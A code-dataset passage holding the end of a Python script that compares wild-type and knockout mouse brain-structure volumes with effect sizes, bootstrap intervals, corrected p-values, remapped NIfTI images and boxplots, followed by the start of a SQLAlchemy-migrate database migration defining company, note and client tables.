2)) / 2)\r\n S_a_RN = np.sqrt((np.power(std_WT_RN, 2) + np.power(std_KO_RN, 2)) / 2)\r\n cohenD_RN_a = (mean_WT_RN - mean_KO_RN) / S_a_RN\r\n hedge_correction = (N - 3) / (N - 2.25)\r\n cohenD_ac = ((mean_WT - mean_KO) / S_a) * hedge_correction\r\n cohenD_RN_ac = ((mean_WT_RN - mean_KO_RN) / S_a_RN) * hedge_correction\r\n # print(f'cohenD_RN = {cohenD_RN}, cohenD_RN_a = {cohenD_RN_a}, '\r\n # f'cohenD_RN_ac = {cohenD_RN_ac}, cohenD_ac = {cohenD_ac}')\r\n\r\n cohenD_BS = np.empty(nIterBootstrap)\r\n cohenD_RN_BS = np.empty(nIterBootstrap)\r\n for iBS in range(nIterBootstrap):\r\n WT_BS = np.random.normal(mean_WT, std_WT, nWT)\r\n KO_BS = np.random.normal(mean_KO, std_KO, nKO)\r\n mean_WT_BS = np.mean(WT_BS)\r\n mean_KO_BS = np.mean(KO_BS)\r\n std_WT_BS = np.std(WT_BS)\r\n std_KO_BS = np.std(KO_BS)\r\n S_p = np.sqrt(((nWT - 1) * np.power(std_WT_BS, 2) + (nKO - 1) * np.power(std_KO_BS, 2)) / (nKO + nWT - 2))\r\n S_a = np.sqrt((np.power(std_WT, 2) + np.power(std_KO, 2)) / 2)\r\n cohenD_BS[iBS] = ((mean_WT_BS - mean_KO_BS) / S_a) * hedge_correction\r\n\r\n WT_RN_BS = np.random.normal(mean_WT_RN, std_WT_RN, nWT)\r\n KO_RN_BS = np.random.normal(mean_KO_RN, std_KO_RN, nKO)\r\n mean_WT_RN_BS = np.mean(WT_RN_BS)\r\n mean_KO_RN_BS = np.mean(KO_RN_BS)\r\n 
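The effect-size arithmetic above packs several steps together: a pooled (or averaged) standard deviation, Cohen's d, and the small-sample factor `(N - 3) / (N - 2.25)`, which is algebraically the standard Hedges approximation `1 - 3 / (4*(N - 2) - 1)`. A self-contained sketch with invented inputs, using `ddof=0` to mirror the script's `np.std`:

```python
import numpy as np

def hedges_g(x, y):
    nx, ny = len(x), len(y)
    N = nx + ny
    # Pooled standard deviation (population std, as np.std defaults to).
    s_p = np.sqrt(((nx - 1) * np.std(x)**2 + (ny - 1) * np.std(y)**2) / (N - 2))
    d = (np.mean(x) - np.mean(y)) / s_p
    # Small-sample correction: (N - 3) / (N - 2.25) == 1 - 3 / (4*(N - 2) - 1).
    return d * (N - 3) / (N - 2.25)

rng = np.random.default_rng(0)
print(hedges_g(rng.normal(1.0, 0.2, 8), rng.normal(0.9, 0.2, 8)))
```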
std_WT_RN_BS = np.std(WT_RN_BS)\r\n std_KO_RN_BS = np.std(KO_RN_BS)\r\n S_p_RN = np.sqrt(\r\n ((nWT - 1) * np.power(std_WT_RN_BS, 2) + (nKO - 1) * np.power(std_KO_RN_BS, 2)) / (nKO + nWT - 2))\r\n S_a_RN = np.sqrt((np.power(std_WT_RN, 2) + np.power(std_KO_RN, 2)) / 2)\r\n cohenD_RN_BS[iBS] = ((mean_WT_RN_BS - mean_KO_RN_BS) / S_a_RN) * hedge_correction\r\n cohenD_ac_CI = [np.quantile(cohenD_BS, .025), np.quantile(cohenD_BS, .975)]\r\n cohenD_RN_ac_CI = [np.quantile(cohenD_RN_BS, .025), np.quantile(cohenD_RN_BS, .975)]\r\n # cohenD_check = [np.quantile(cohenD_BS, .5), np.median(cohenD_BS)]\r\n # print(cohenD_check)\r\n\r\n\r\n\r\n mouse_table_pername_list.append(pd.DataFrame({'name': [nameStruct],\r\n 'cohenD': [cohenD_ac],\r\n 'cohenD_CI': [cohenD_ac_CI],\r\n 'cohenD_BrainNormalized': [cohenD_RN_ac],\r\n 'cohenD_BrainNormalized_CI': [cohenD_RN_ac_CI],\r\n 't_stat': [t_stat],\r\n 'pVal': [p_val],\r\n 'pVal_BrainNormalized': [p_val_RN],\r\n 'WT_mean': [mean_WT],\r\n 'WT_std': [std_WT],\r\n 'KO_mean': [mean_KO],\r\n 'KO_std': [std_KO],\r\n 'WT_mean_AllenNormalized': [mean_WT_AN],\r\n 'WT_std_AllenNormalized': [std_WT_AN],\r\n 'KO_mean_AllenNormalized': [mean_KO_AN],\r\n 'KO_std_AllenNormalized': [std_KO_AN],\r\n 'WT_mean_BrainNormalized': [mean_WT_RN],\r\n 'WT_std_BrainNormalized': [std_WT_RN],\r\n 'KO_mean_BrainNormalized': [mean_KO_RN],\r\n 'KO_std_BrainNormalized': [std_KO_RN]}))\r\n\r\n # nameStruct_filename = \"\".join([c for c in nameStruct if c.isalpha() or c.isdigit() or c == ' ']).rstrip()\r\n # mouse_table_nameStruct.to_csv(os.path.join(analysis_path, 'perstructure', nameStruct_filename+'_volumes_mouse.csv'))\r\n\r\n mouse_table_pername = pd.concat(mouse_table_pername_list, ignore_index=True)\r\n pVal_isnan = np.logical_not(np.isnan(mouse_table_pername['pVal']))\r\n mouse_table_pername.loc[pVal_isnan, 'pValBon'] = \\\r\n multipletests(mouse_table_pername.loc[pVal_isnan, 'pVal'], method='bonferroni')[1]\r\n mouse_table_pername.loc[pVal_isnan, 'pValFDR'] = \\\r\n multipletests(mouse_table_pername.loc[pVal_isnan, 'pVal'], method='fdr_bh')[1]\r\n pVal_isnan = np.logical_and(np.logical_not(np.isnan(mouse_table_pername['pVal_BrainNormalized'])),\r\n mouse_table_pername['name'] != 'root')\r\n mouse_table_pername.loc[pVal_isnan, 'pValBon_BrainNormalized'] = \\\r\n multipletests(mouse_table_pername.loc[pVal_isnan, 'pVal_BrainNormalized'], method='bonferroni')[1]\r\n mouse_table_pername.loc[pVal_isnan, 'pValFDR_BrainNormalized'] = \\\r\n multipletests(mouse_table_pername.loc[pVal_isnan, 'pVal_BrainNormalized'], method='fdr_bh')[1]\r\n mouse_table_pername = mouse_table_pername.sort_values(by='pVal_BrainNormalized')\r\n mouse_table_pername = mouse_table_pername.reindex(columns=['name',\r\n 'cohenD', 'cohenD_BrainNormalized',\r\n 'cohenD_CI', 'cohenD_BrainNormalized_CI',\r\n 't_stat', 'pVal', 'pVal_BrainNormalized',\r\n 'pValBon', 'pValBon_BrainNormalized',\r\n 'pValFDR', 'pValFDR_BrainNormalized',\r\n 'WT_mean', 'WT_std',\r\n 'KO_mean', 'KO_std',\r\n 'WT_mean_AllenNormalized', 'WT_std_AllenNormalized',\r\n 'KO_mean_AllenNormalized', 'KO_std_AllenNormalized',\r\n 'WT_mean_BrainNormalized', 'WT_std_BrainNormalized',\r\n 'KO_mean_BrainNormalized', 'KO_std_BrainNormalized'])\r\n mouse_table_pername.to_csv(pername_table_path_list[iIncludeInTest])\r\n\r\n # Add id_custom column to pVal table\r\n mouse_table_pername = pd.merge(left=mouse_table_pername, right=structure.loc[:, ['name', 'id_custom']],\r\n left_on='name', right_on='name')\r\n mouse_table_pername['pVal_inv'] = 
np.abs(np.log10(mouse_table_pername['pVal']))\r\n\r\n # Save separate pval table with only cerebellum or only sn (lowLevel)\r\n # if iIncludeInTest == 0:\r\n if iIncludeInTest<4:\r\n pername_table_in = pd.merge(left=mouse_table_pername,\r\n right=reference_table[['id_custom', 'in_cerebellum', 'in_sn']],\r\n left_on='id_custom', right_on='id_custom')\r\n ce_logical = np.logical_and(np.logical_and(pername_table_in['in_cerebellum'],\r\n np.logical_not(np.isnan(pername_table_in['cohenD']))),\r\n np.isin(pername_table_in['id_custom'], annotation_lowLevel_list))\r\n pername_table_cerebellum = pername_table_in[ce_logical]\r\n pername_table_cerebellum = pername_table_cerebellum.drop('in_cerebellum', 1)\r\n pername_table_cerebellum['pValBon'] = multipletests(pername_table_cerebellum['pVal'], method='bonferroni')[1]\r\n pername_table_cerebellum['pValFDR'] = multipletests(pername_table_cerebellum['pVal'], method='fdr_bh')[1]\r\n pername_table_cerebellum['pValBon_BrainNormalized'] = multipletests(pername_table_cerebellum['pVal_BrainNormalized'], method='bonferroni')[1]\r\n pername_table_cerebellum['pValFDR_BrainNormalized'] = multipletests(pername_table_cerebellum['pVal_BrainNormalized'], method='fdr_bh')[1]\r\n pername_table_cerebellum.to_csv(pername_cerebellum_table_path_list[iIncludeInTest])\r\n\r\n sn_logical = np.logical_and(np.logical_and(np.logical_not(pername_table_in['in_cerebellum']),\r\n np.logical_not(np.isnan(pername_table_in['cohenD']))),\r\n np.isin(pername_table_in['id_custom'], annotation_lowLevel_list))\r\n pername_table_sn = pername_table_in[sn_logical]\r\n pername_table_sn = pername_table_sn.drop('in_sn', 1)\r\n pername_table_sn['pValBon'] = multipletests(pername_table_sn['pVal'], method='bonferroni')[1]\r\n pername_table_sn['pValFDR'] = multipletests(pername_table_sn['pVal'], method='fdr_bh')[1]\r\n pername_table_sn['pValBon_BrainNormalized'] = multipletests(pername_table_sn['pVal_BrainNormalized'], method='bonferroni')[1]\r\n pername_table_sn['pValFDR_BrainNormalized'] = multipletests(pername_table_sn['pVal_BrainNormalized'], method='fdr_bh')[1]\r\n pername_table_sn.to_csv(pername_sn_table_path_list[iIncludeInTest])\r\n\r\n# Create reference images with p-values in the image instead of structure integers\r\nmean_diff = mouse_table_pername['KO_mean'] - mouse_table_pername['WT_mean']\r\nmap_from = np.array(mouse_table_pername['id_custom'])\r\nfor i in range(12):\r\n\r\n annotation_pVal_path = os.path.join(analysis_path, annotation_path.split(os.sep)[-1].split('.')[0])\r\n if i == 0:\r\n map_to = np.array(mouse_table_pername['pVal'])\r\n annotation_pVal_path = annotation_pVal_path + '_pVal' + '.nii.gz'\r\n elif i == 1:\r\n map_to = np.array(mouse_table_pername['pVal_inv'])\r\n annotation_pVal_path = annotation_pVal_path + '_pVal_inv' + '.nii.gz'\r\n elif i == 2:\r\n map_to = np.array(mouse_table_pername['pVal'] * (mouse_table_pername['pVal'] < 0.05))\r\n annotation_pVal_path = annotation_pVal_path + '_pVal_sig' + '.nii.gz'\r\n elif i == 3:\r\n map_to = np.array(mouse_table_pername['pVal_inv'] * (mouse_table_pername['pVal'] < 0.05))\r\n annotation_pVal_path = annotation_pVal_path + '_pVal_inv_sig' + '.nii.gz'\r\n elif i == 4:\r\n map_to = np.array(mouse_table_pername['pVal'] * (mean_diff > 0))\r\n annotation_pVal_path = annotation_pVal_path + '_pVal_volIncrease' + '.nii.gz'\r\n elif i == 5:\r\n map_to = np.array(mouse_table_pername['pVal'] * (mean_diff < 0))\r\n annotation_pVal_path = annotation_pVal_path + '_pVal_volDecrease' + '.nii.gz'\r\n elif i == 6:\r\n map_to = 
np.array(mouse_table_pername['pVal_inv'] * (mean_diff > 0))\r\n annotation_pVal_path = annotation_pVal_path + '_pVal_inv_volIncrease' + '.nii.gz'\r\n elif i == 7:\r\n map_to = np.array(mouse_table_pername['pVal_inv'] * (mean_diff < 0))\r\n annotation_pVal_path = annotation_pVal_path + '_pVal_inv_volDecrease' + '.nii.gz'\r\n elif i == 8:\r\n map_to = np.array(mouse_table_pername['pVal'] * (mouse_table_pername['pVal'] < 0.05) * (mean_diff > 0))\r\n annotation_pVal_path = annotation_pVal_path + '_pVal_sig_volIncrease' + '.nii.gz'\r\n elif i == 9:\r\n map_to = np.array(mouse_table_pername['pVal'] * (mouse_table_pername['pVal'] < 0.05) * (mean_diff < 0))\r\n annotation_pVal_path = annotation_pVal_path + '_pVal_sig_volDecrease' + '.nii.gz'\r\n elif i == 10:\r\n map_to = np.array(mouse_table_pername['pVal_inv'] * (mouse_table_pername['pVal'] < 0.05) * (mean_diff > 0))\r\n annotation_pVal_path = annotation_pVal_path + '_pVal_inv_sig_volIncrease' + '.nii.gz'\r\n elif i == 11:\r\n map_to = np.array(mouse_table_pername['pVal_inv'] * (mouse_table_pername['pVal'] < 0.05) * (mean_diff < 0))\r\n annotation_pVal_path = annotation_pVal_path + '_pVal_inv_sig_volDecrease' + '.nii.gz'\r\n\r\n map_to_filt = np.logical_not(np.isnan(map_to))\r\n map_to_filtered = map_to[map_to_filt]\r\n map_from_filtered = map_from[map_to_filt]\r\n\r\n annotation_remapped = np.round(annotation) # always annotation so should never be non-integer\r\n # input = input.astype(int) # always annotation so should never be non-integer\r\n annotation_remapped_shape = annotation_remapped.shape\r\n annotation_remapped = annotation_remapped.reshape(-1)\r\n annotation_remapped = npi.remap(annotation_remapped, map_from_filtered, map_to_filtered)\r\n annotation_remapped = annotation_remapped.reshape(annotation_remapped_shape)\r\n # annotation_remapped = remap_3D(annotation, map_from_filtered.astype(int), map_to_filtered)\r\n\r\n output_image = nib.Nifti1Image(annotation_remapped,\r\n annotation_image.affine)\r\n nib.save(output_image, annotation_pVal_path)\r\n\r\n\r\n\r\n########################################################################################################################\r\n# Create reference images with expression in the image instead of structure integers\r\npername_merged_table['pVal_inv_histo'] = np.abs(np.log10(pername_merged_table['pVal_histo']))\r\npername_merged_table = pd.merge(left=pername_merged_table,\r\n right=structure[['acronym', 'id_custom']],\r\n left_on='acronym',\r\n right_on='acronym')\r\nmap_from = pername_merged_table['id_custom']\r\nannotation_expIso = annotation * np.isin(annotation, map_from) # Everything not included in map_from should be 0 (no expression data for these structures)\r\nfor i in range(7):\r\n annotation_expression_path = os.path.join(analysis_path, annotation_path.split(os.sep)[-1].split('.')[0])\r\n if i == 0:\r\n map_to = np.ones(pername_merged_table.shape[0])\r\n annotation_expression_path = annotation_expression_path + '_expression_mask' + '.nii.gz'\r\n elif i == 1:\r\n map_to = np.array(pername_merged_table['cohenD_histo'])\r\n annotation_expression_path = annotation_expression_path + '_expression_cohenD' + '.nii.gz'\r\n elif i == 2:\r\n map_to = np.array(pername_merged_table['pVal_inv_histo'])\r\n annotation_expression_path = annotation_expression_path + '_expression_pValAbsLog' + '.nii.gz'\r\n elif i == 3:\r\n map_to = np.array(pername_merged_table['pVal_inv_histo']) * np.array(pername_merged_table['cohenD_histo'] > 0)\r\n annotation_expression_path = annotation_expression_path 
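Both remapping loops lean on `npi.remap`, presumably from the `numpy_indexed` package, to swap structure integers for p-values or expression statistics. For readers without that dependency, a pure-NumPy equivalent based on `searchsorted`, with invented toy labels (the fill value plays the role of "no mapping, stay at 0"):

```python
import numpy as np

def remap(values, map_from, map_to, fill=0.0):
    # Map each entry of `values` found in map_from to the matching map_to
    # entry, leaving everything else at `fill`.
    order = np.argsort(map_from)
    keys, vals = map_from[order], map_to[order]
    idx = np.clip(np.searchsorted(keys, values), 0, len(keys) - 1)
    hit = keys[idx] == values
    out = np.full(values.shape, fill, dtype=float)
    out[hit] = vals[idx[hit]]
    return out

labels = np.array([[0, 7], [7, 42]])  # toy 2D annotation
print(remap(labels, np.array([7, 42]), np.array([0.01, 0.3])))
# -> [[0.   0.01]
#     [0.01 0.3 ]]
```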
+ '_expression_pValAbsLog_expDecrease' + '.nii.gz'\r\n elif i == 4:\r\n map_to = np.array(pername_merged_table['pVal_inv_histo']) * np.array(pername_merged_table['cohenD_histo'] < 0)\r\n annotation_expression_path = annotation_expression_path + '_expression_pValAbsLog_expIncrease' + '.nii.gz'\r\n elif i == 5:\r\n map_to = np.array(pername_merged_table['WT_mean_histo'])\r\n annotation_expression_path = annotation_expression_path + '_expression_WT_mean' + '.nii.gz'\r\n elif i == 6:\r\n map_to = np.array(pername_merged_table['KO_mean_histo'])\r\n annotation_expression_path = annotation_expression_path + '_expression_KO_mean' + '.nii.gz'\r\n\r\n map_to_filt = np.logical_not(np.isnan(map_to))\r\n map_to_filtered = map_to[map_to_filt]\r\n map_from_filtered = map_from[map_to_filt]\r\n\r\n annotation_remapped = np.round(annotation_expIso) # always annotation so should never be non-integer\r\n # input = input.astype(int) # always annotation so should never be non-integer\r\n annotation_remapped_shape = annotation_remapped.shape\r\n annotation_remapped = annotation_remapped.reshape(-1)\r\n annotation_remapped = npi.remap(annotation_remapped, map_from_filtered, map_to_filtered)\r\n annotation_remapped = annotation_remapped.reshape(annotation_remapped_shape)\r\n # annotation_remapped = remap_3D(annotation, map_from_filtered.astype(int), map_to_filtered)\r\n\r\n output_image = nib.Nifti1Image(annotation_remapped,\r\n annotation_image.affine)\r\n nib.save(output_image, annotation_expression_path)\r\n########################################################################################################################\r\n\r\n\r\n\r\nVOIs = list(np.unique(output_table_all['name']))\r\nfigure_folder_path = os.path.join(analysis_path, 'Figures')\r\nif not os.path.exists(figure_folder_path):\r\n os.makedirs(figure_folder_path)\r\nfor iVOI in range(len(VOIs)):\r\n VOI_fileName = VOIs[iVOI].replace('/', '')\r\n output_table_all_VOI = output_table_all[output_table_all['name'] == VOIs[iVOI]]\r\n colorList = list()\r\n for iSub in range(output_table_all_VOI.shape[0]):\r\n if output_table_all_VOI['Genotype'].iloc[iSub] == 'WT':\r\n colorList.append((0.12156862745098039, 0.4666666666666667, 0.7058823529411765))\r\n else:\r\n colorList.append((1.0, 0.4980392156862745, 0.054901960784313725))\r\n\r\n # Figure 1: Boxplot volumes - absolute\r\n # fig1 = plt.figure()\r\n # ax = output_table_all_VOI[['VolumeNormalized', 'Genotype']].boxplot(\r\n # by=['Genotype'])\r\n #\r\n # plt.ylabel('Volume Normalized')\r\n # plt.xlabel('Genotype')\r\n # plt.title(VOIs[iVOI] + ' volumes')\r\n # plt.suptitle('') # that's what you're after\r\n # # ax.set_xticklabels(['WT', 'KO'])\r\n # # plt.show()\r\n # plt.savefig(os.path.join(figure_folder_path, 'Boxplot_' + VOI_fileName + '_ByGenotype'))\r\n\r\n # Figure 2: Boxplot volumes - root normalized\r\n fig2 = plt.figure()\r\n ax = output_table_all_VOI[['VolumeRootNormalized', 'Genotype']].boxplot(\r\n by=['Genotype'])\r\n\r\n plt.ylabel('Volume Percentage')\r\n plt.xlabel('Genotype')\r\n plt.title(VOIs[iVOI] + ' volumes')\r\n plt.suptitle('') # that's what you're after\r\n # ax.set_xticklabels(['WT', 'KO'])\r\n # plt.show()\r\n plt.savefig(os.path.join(figure_folder_path, 'Boxplot_' + VOI_fileName + '_ByGenotype_rootNormalized'))\r\n\r\n # Figure 3: Barplot volumes - root normalized\r\n fig3 = plt.figure()\r\n ax = output_table_all_VOI.plot.bar(x='Mouse',\r\n y='VolumeRootNormalized',\r\n rot=60,\r\n color=colorList)\r\n plt.ylabel('Volume Normalized to Root')\r\n # plt.title(nameStruct + 
'_' + atlasStruct + ', CohenD = ' + format('%.2f'%cohenD_current))\r\n ax.get_legend().remove()\r\n # plt.show()\r\n plt.savefig(os.path.join(figure_folder_path, 'Barplot_' + VOI_fileName + '_BySubject_rootNormalized'))\r\n plt.close('all')\r\n\r\n # Figure 4: Barplot volumes - absolute reference normalized\r\n fig4 = plt.figure()\r\n ax = output_table_all_VOI.plot.bar(x='Mouse',\r\n y='VolumeNormalized',\r\n rot=60,\r\n color=colorList)\r\n plt.ylabel('Volume Normalized to Reference')\r\n # plt.title(nameStruct + '_' + atlasStruct + ', CohenD = ' + format('%.2f'%cohenD_current))\r\n ax.get_legend().remove()\r\n # plt.show()\r\n plt.savefig(os.path.join(figure_folder_path, 'Barplot_' + VOI_fileName + '_BySubject_referenceNormalized'))\r\n plt.close('all')\r\n#######################################################################################################################\r\n\r\n\r\n\r\n#\r\n#\r\n# volume_name = 'Lobule II'\r\n# ax = mouse_table_all[mouse_table_all['name']==volume_name][['Volume', 'Genotype']].boxplot(by=['Genotype'])\r\n# plt.ylabel('$mm^3$')\r\n# plt.xlabel('Genotype')\r\n# plt.title(volume_name + ' volumes')\r\n# plt.suptitle('') # that's what you're after\r\n# # ax.set_xticklabels(['WT', 'KO'])\r\n# # plt.show()\r\n# plt.savefig(os.path.join(analysis_path, 'Boxplot_'+volume_name+'_ByGenotype'))\r\n#\r\n# volume_name = 'Substantia nigra, compact part'\r\n# ax = mouse_table_all[mouse_table_all['name']==volume_name][['Volume', 'Genotype']].boxplot(by=['Genotype'])\r\n# plt.ylabel('$mm^3$')\r\n# plt.xlabel('Genotype')\r\n# plt.title(volume_name + ' volumes')\r\n# plt.suptitle('') # that's what you're after\r\n# # ax.set_xticklabels(['WT', 'KO'])\r\n# # plt.show()\r\n# plt.savefig(os.path.join(analysis_path, 'Boxplot_'+volume_name+'_ByGenotype'))\r\n#\r\n# volume_name = 'Substantia nigra, reticular part'\r\n# ax = mouse_table_all[mouse_table_all['name']==volume_name][['Volume', 'Genotype']].boxplot(by=['Genotype'])\r\n# plt.ylabel('$mm^3$')\r\n# plt.xlabel('Genotype')\r\n# plt.title(volume_name + ' volumes')\r\n# plt.suptitle('') # that's what you're after\r\n# # ax.set_xticklabels(['WT', 'KO'])\r\n# # plt.show()\r\n# plt.savefig(os.path.join(analysis_path, 'Boxplot_'+volume_name+'_ByGenotype'))\r\n#\r\n# # Plotting by genotype and sex\r\n# volume_name = 'Lobules IV-V'\r\n# ax = mouse_table_all[mouse_table_all['name']==volume_name][['Volume', 'Genotype', 'Sex']].boxplot(by=['Genotype', 'Sex'])\r\n# plt.ylabel('$mm^3$')\r\n# plt.xlabel('Genotype and Sex')\r\n# plt.title(volume_name + ' volumes')\r\n# plt.suptitle('') # that's what you're after\r\n# # ax.set_xticklabels(['WT', 'KO'])\r\n# # plt.show()\r\n# plt.savefig(os.path.join(analysis_path, 'Boxplot_'+volume_name+'_ByGenotypeSex'))\r\n\r\n\r\n# Create volume tables per structure\r\n\r\n\r\n# # Load files\r\n# low_detail_cerebellum_image = nib.load(low_detail_cerebellum_path)\r\n# low_detail_cerebellum = low_detail_cerebellum_image.get_fdata()\r\n# high_detail_image = nib.load(high_detail_path)\r\n# high_detail = high_detail_image.get_fdata()\r\n# structure_graph = pd.read_csv(allen_structure_table_path_lowdetail)\r\n\r\n\r\n# Load remapped structuregraph\r\n\r\n# Loop through annotated images\r\n\r\n# Load image\r\n\r\n# Calculate highdetail volumes\r\n\r\n# Infer lowdetail volumes\r\n\r\n# Creat and save table for each mouse\r\n\r\n# Combine tables into one great table for all mice in analysis folder\r\n\r\n# Plot some boxplot plots\r\n\r\n\r\n#\r\n# ## Mask volume computation, separate from Allen and invwarped 
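The per-VOI figure block above uses pandas' grouped boxplot, whose automatic super-title has to be blanked with `plt.suptitle('')` (the "that's what you're after" comments). A minimal runnable version of that pattern with invented data, using the Agg backend so it also works headless:

```python
import matplotlib
matplotlib.use('Agg')  # save figures without a display, as in batch analysis
import matplotlib.pyplot as plt
import pandas as pd

df = pd.DataFrame({'VolumeRootNormalized': [1.0, 1.1, 0.8, 0.85],
                   'Genotype': ['WT', 'WT', 'KO', 'KO']})
df[['VolumeRootNormalized', 'Genotype']].boxplot(by=['Genotype'])
plt.ylabel('Volume Percentage')
plt.xlabel('Genotype')
plt.suptitle('')  # drop the automatic "Boxplot grouped by Genotype" title
plt.savefig('Boxplot_example.png')
plt.close('all')
```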
computations\r\n# mouse_voxel_number = mouse_list.copy()\r\n# mouse_mask_volume = mouse_list.copy()\r\n# for iMouse, Mouse in enumerate(mouse_list):\r\n# mouse_mask_image = nib.load(os.path.join(data_path, Mouse, (Mouse+'_mask_t=500_v=380_k=6.mask.nii.gz')))\r\n# mouse_mask_image_array = mouse_mask_image.get_fdata()\r\n#\r\n# mouse_voxel_number[iMouse] = np.sum(mouse_mask_image_array>0)\r\n# mouse_mask_volume[iMouse] = mouse_voxel_number[iMouse]*voxel_volume\r\n#\r\n# mouse_mask_table = pd.DataFrame({'Mouse': mouse_list, 'MaskVoxelNumber': mouse_voxel_number, 'MaskVolume': mouse_mask_volume})\r\n# mouse_mask_table['Genotype'] = mouse_mask_table['Mouse'].str.split(\"_\", n = 1, expand = True).iloc[:, 0]\r\n# mouse_mask_table['Sex'] = mouse_mask_table['Mouse'].str.split(\"_\", n = 3, expand = True).iloc[:, 2]\r\n# mouse_mask_table.loc[mouse_mask_table['Sex'] != 'female', 'Sex'] = 'male'\r\n#\r\n# # Plotting by genotype\r\n# gen_fig = plt.figure(1)\r\n# annotation_bin = nib.load(allen_image)\r\n# annotation_bin_array = annotation_bin.get_fdata()\r\n# allen_voxelnumber = np.sum(annotation_bin_array>.1)\r\n# allen_volume = allen_voxelnumber * voxel_reference_volume\r\n# mouse_mask_table_plot = pd.concat([mouse_mask_table, pd.DataFrame({'Mouse': ['Allen'], 'MaskVoxelNumber': [allen_voxelnumber], 'MaskVolume': [allen_volume], 'Genotype': ['Allen']})], sort=True)\r\n# # plt.suptitle('figure title')\r\n# # mouse_mask_table_plot=mouse_mask_table\r\n# ax = mouse_mask_table_plot[['MaskVolume', 'Genotype']].boxplot(by=['Genotype'])\r\n# # mouse_mask_table_plot.loc[mouse_mask_table_plot['Genotype'] == 'WT', 'Genotype'] = 1\r\n# # mouse_mask_table_plot.loc[mouse_mask_table_plot['Genotype'] == 'KO', 'Genotype'] = 2\r\n# plt.ylabel('$mm^3$')\r\n# plt.xlabel('Genotype')\r\n# plt.title('Brain mask volumes')\r\n# plt.suptitle('') # that's what you're after\r\n# # ax.set_xticklabels(['WT', 'KO'])\r\n# plt.show()\r\n# plt.savefig(os.path.join(analysis_path, 'Boxplot_MaskVolumes_ByGenotype_Allen'))\r\n#\r\n# # Plotting by genotype and sex\r\n# gensex_fig = plt.figure(2)\r\n# mouse_mask_table[['MaskVolume', 'Genotype', 'Sex']].boxplot(by=['Genotype', 'Sex'])\r\n# plt.ylabel('$mm^3$')\r\n# plt.ylabel('')\r\n# plt.savefig(os.path.join(analysis_path, 'Boxplot_MaskVolumes_ByGenotypeSex'))\r\n# # plt.show()\r\n#\r\n# # pval calculation, equal_var for now ;)\r\n# mouse_mask_table[mouse_mask_table['Genotype'] == 'WT']['MaskVolume']\r\n# cat2 = mouse_mask_table[mouse_mask_table['Genotype'] == 'KO']\r\n#\r\n# print(ttest_ind(mouse_mask_table[mouse_mask_table['Genotype'] == 'WT']['MaskVolume'],\r\n# mouse_mask_table[mouse_mask_table['Genotype'] == 'KO']['MaskVolume'],\r\n# equal_var=True))\r\n#\r\n# mouse_mask_table.to_csv(os.path.join(analysis_path, 'Mouse_maskvolume_table.csv'))\r\n#\r\n#\r\n#\r\n#\r\n#\r\n#\r\n#\r\n# # Define structure graph\r\n# structure_graph = pd.read_csv(os.path.join(allen_path, 'structure_graph_remapped.csv'))\r\n#\r\n#\r\n#\r\n# ## Get list of invwarped annotation files and compute volumes for them, compiling eventually into single table\r\n# mouse_invwarped_list = glob.glob(data_path+'/*/*/*invwarped*')\r\n# mouse_table_invwarped_list = mouse_invwarped_list.copy()\r\n# for iMouse, Mouse in enumerate(mouse_invwarped_list):\r\n# Mouse_name = Mouse.split('/')[7]\r\n# FNIRT_run = Mouse.split('/')[-2]\r\n#\r\n# mouse_table_invwarped_list[iMouse] = image2volumetable(Mouse)\r\n# mouse_table_invwarped_list[iMouse]['Mouse'] = Mouse_name\r\n# mouse_table_invwarped_list[iMouse]['FNIRT_run'] = 
FNIRT_run\r\n#\r\n# mouse_table_invwarped = pd.concat(mouse_table_invwarped_list)\r\n#\r\n# mouse_mask_table.to_csv(os.path.join(analysis_path, 'Mouse_invwarped_table.csv'))\r\n#\r\n#\r\n#\r\n# ## Compute volumes for allen reference\r\n# allen_table = image2volumetable(allen_image)\r\n# allen_table['Mouse'] = 'allen'\r\n# allen_table.to_csv(os.path.join(analysis_path, 'allen_table.csv'))\r\n\r\n\r\n# ## Compute volumes for flirted allen reference\r\n# allen_flirted_table = image2volumetable(allen_image_flirted)\r\n# allen_flirted_table['Mouse'] = 'allen_flirted'\r\n# allen_flirted_table.to_csv(os.path.join(analysis_path, 'allen_flirted_table.csv'))\r\n#\r\n#\r\n#\r\n#\r\n#\r\n#\r\n# # for i in range(100):\r\n# # print(i)\r\n# # print(np.any(pd.DataFrame(oapi.get_structures(i+1))['id']==182305696))\r\n","sub_path":"compute_volumes_mouse.py","file_name":"compute_volumes_mouse.py","file_ext":"py","file_size_in_byte":59235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"175864151","text":"from sqlalchemy import *\nfrom migrate import *\n\n\nfrom migrate.changeset import schema\npre_meta = MetaData()\npost_meta = MetaData()\ncompany = Table('company', post_meta,\n Column('id', INTEGER, primary_key=True, nullable=False),\n Column('name', VARCHAR(length=55)),\n Column('city', VARCHAR(length=55)),\n Column('state', VARCHAR(length=10), default=ColumnDefault('CA')),\n Column('zipcode', VARCHAR(length=15)),\n)\n\nnote = Table('note', post_meta,\n Column('id', INTEGER, primary_key=True, nullable=False),\n Column('appt_id', INTEGER),\n Column('client_id', INTEGER),\n Column('therapist_id', INTEGER),\n Column('note', Text),\n Column('created_date', DATETIME),\n)\n\nclient_eval = Table('client_eval', pre_meta,\n Column('id', INTEGER(), primary_key=True, nullable=False),\n Column('client_id', INTEGER()),\n Column('eval_type_id', INTEGER()),\n Column('therapist_id', INTEGER()),\n Column('created_date', TIMESTAMP, nullable=False),\n)\n\nclient_auth = Table('client_auth', pre_meta,\n Column('id', INTEGER(), primary_key=True, nullable=False),\n Column('client_id', INTEGER()),\n Column('auth_start', DATETIME),\n Column('auth_end', DATETIME),\n Column('auth_id', INTEGER()),\n Column('monthly_visits', INTEGER()),\n)\n\nclient_auth = Table('client_auth', post_meta,\n Column('id', INTEGER, primary_key=True, nullable=False),\n Column('client_id', INTEGER),\n Column('therapist_id', INTEGER),\n Column('auth_start_date', DATETIME),\n Column('auth_end_date', DATETIME),\n Column('auth_id', INTEGER),\n Column('monthly_visits', INTEGER),\n Column('created_date', DATETIME),\n)\n\n\ndef upgrade(migrate_engine):\n # Upgrade operations go here. 
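The `020_migration.py` record above follows the usual sqlalchemy-migrate shape: `pre_meta` describes the schema before the change, `post_meta` the schema after, and `downgrade()` mirrors `upgrade()` operation for operation. A stripped-down sketch of that symmetry with a hypothetical `example` table (importing `migrate.changeset` patches `Column` with `create()`/`drop()`, which is why the real file imports it):

```python
from sqlalchemy import MetaData, Table, Column, INTEGER
from migrate.changeset import schema  # noqa: enables Column.create/.drop

pre_meta, post_meta = MetaData(), MetaData()

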